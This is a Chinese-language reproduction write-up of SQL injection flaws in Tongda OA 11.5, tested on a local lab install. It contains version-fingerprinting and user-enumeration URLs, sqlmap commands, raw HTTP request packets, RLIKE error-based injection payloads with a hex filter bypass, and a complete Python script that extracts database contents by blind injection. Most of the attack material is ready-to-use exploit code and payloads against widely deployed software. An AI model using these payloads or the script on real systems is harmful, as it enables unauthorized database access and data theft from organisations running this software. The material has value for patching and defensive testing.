漏洞描述
通达OA 11.5存在sql注入
漏洞影响版本
通达oa 11.5
判断通达oa版本:
http[s]://TongDaOA.domain/inc/expired.php 判断通达版本
http[s]://TongDaOA.domain/inc/reg_trial.php
http[s]://TongDaOA.domain/inc/reg_trial_submit.php
http[s]://TongDaOA.domain/ispirit/retrieve_pwd.php
GET 参数username、email 可爆用户、邮箱
http[s]://TongDaOA.domain/resque/worker.php 计算机名
/inc/expired.php
/resque/worker.php
本地复现
首先下载通达OA 11.5,https://cdndown.tongda2000.com/oa/2019/TDOA11.5.exe
安装好后使用 admin 空密码 登录
然后新建一个普通用户 test:test123456,登录test账户
漏洞点1 id参数(布尔盲注和时间盲注)
id参数存在sql注入,位置/general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2
,使用sqlmap进行注入
python sqlmap.py -u "http://192.168.43.129/general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2" -p "id" --cookie "PHPSESSID=3v2mhf591c0jsq3kq8tba98q57; USER_NAME_COOKIE=test; OA_USER_ID=65; SID_65=f4586f66; _csrf=4c3bd17849ec492e8d49a4eb7ec85dc614f22fb1195264aee25c341f17953e2da%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22g-FcCpSREk0gavd50I0nIYzAhtkCzRrg%22%3B%7D" --batch --is-dba
漏洞点2 starttime参数(时间盲注)
利用条件:一枚普通账号登录权限,但测试发现,某些低版本也无需登录也可注入
位置:/general/appbuilder/web/calendar/calendarlist/getcallist
数据包
GET /general/appbuilder/web/calendar/calendarlist/getcallist HTTP/1.1
Host: 192.168.43.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=hdjbtbc1p2qr9tav02th3ebqu7; USER_NAME_COOKIE=test1; OA_USER_ID=65; SID_65=e6f0418; _csrf=2165a3174ba8ffd85322e6723e6deebc10a1f5b63d322bb1dc03f2f8afc5acbca%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%226LtDoOtdrUIANavkiSKXnW19CC47gdLi%22%3B%7D; SID_1=df1aabe7
Upgrade-Insecure-Requests: 1
starttime=1&endtime=1598918400&view=month&condition=1
使用sqlmap进行测试,python sqlmap.py -r .\test.txt --batch --dbs
漏洞点3 orderby参数
利用条件:一枚普通账号登录权限,但测试发现,某些低版本也无需登录也可注入
位置一,/general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3&pagelimit=10&tag=×tamp=1598069103&total=
位置二,/general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=&pagelimit=10&tag=×tamp=1598069103&total=
这里使用rlike()报错注入
,rlike()是regerp_like()的同义词。rlike遇到特殊字符(
和)
报错,于是表达式输出1正常回显,表达式错误即输出特殊字符,报错。这里还过滤了单引号,使用16进制绕过,(
即为0x28
。
如下测试语句
3 RLIKE (SELECT (CASE WHEN (1=1) THEN 1 ELSE 0x28 END)) # 1=1为真,输出1,正常回显
3 RLIKE (SELECT (CASE WHEN (1=2) THEN 1 ELSE 0x28 END)) # 1=2为假,输出0x28,0x28为特殊字符报错
1=1,正常回显
1=2,输出特殊符号0x28,报错
写了一个脚本来自动注入
import requests
import urllib
url = 'http://192.168.43.129/general/email/inbox/get_index_data.php'
cookies = "USER_NAME_COOKIE=test1; SID_65=569f697c; SID_1=df1aabe7; PHPSESSID=e4kdfoeb9r9gc5v486uno0nm15; OA_USER_ID=65; _csrf=2165a3174ba8ffd85322e6723e6deebc10a1f5b63d322bb1dc03f2f8afc5acbca%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%226LtDoOtdrUIANavkiSKXnW19CC47gdLi%22%3B%7D"
sql = '(select database())'
flag = ''
for i in range(1, 50):
high = 132
low = 32
mid = (high+low)//2
while high > low:
char = flag+chr(mid)
headers = {
"cookie": urllib.parse.unquote(cookies)
}
target = url + "?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3 RLIKE (SELECT (CASE " \
"WHEN (substr({0},{1},1)>={2}) THEN 1 ELSE 0x28 " \
"END))&pagelimit=10&tag=×tamp=1598069103&total= ".format(sql, i, hex(mid))
# print(target)
s = requests.get(url=target, headers=headers)
# print(s.text)
if 'timestamp' in s.text:
low = mid+1
else:
high = mid
mid = (high+low)//2
if mid == 33 or mid ==132:
exit(0)
flag += chr(mid-1)
print("[+] "+flag)
用户名为rOOt@::1
数据库为tDzOA
漏洞点4 SORT_ID,FILE_SORT参数
利用条件:11.5版本无需登录
位置:/general/file_folder/swfupload_new.php
参数:SORT_ID,FILE_SORT
数据包
POST /general/file_folder/swfupload_new.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Referer: http://192.168.202.1/general/meeting/myapply/details.php?affair=true&id=5&nosign=true&reminding=true
X-Resource-Type: xhr
Connection: close
Host: 192.168.77.137
Pragma: no-cache
x-requested-with: XMLHttpRequest
Content-Length: 433
x-wvs-id: Acunetix-Deepscan/186
Cache-Control: no-cache
accept: */*
origin: http://192.168.202.1
Accept-Language: en-US
Content-Type: multipart/form-data; boundary=----------GFioQpMK0vv2
------------GFioQpMK0vv2
Content-Disposition: form-data; name="ATTACHMENT_ID"
1
------------GFioQpMK0vv2
Content-Disposition: form-data; name="ATTACHMENT_NAME"
1
------------GFioQpMK0vv2
Content-Disposition: form-data; name="FILE_SORT"
2
------------GFioQpMK0vv2
Content-Disposition: form-data; name="SORT_ID"
0 RLIKE (SELECT (CASE WHEN (1=1) THEN 1 ELSE 0x28 END))
------------GFioQpMK0vv2--
这里复现失败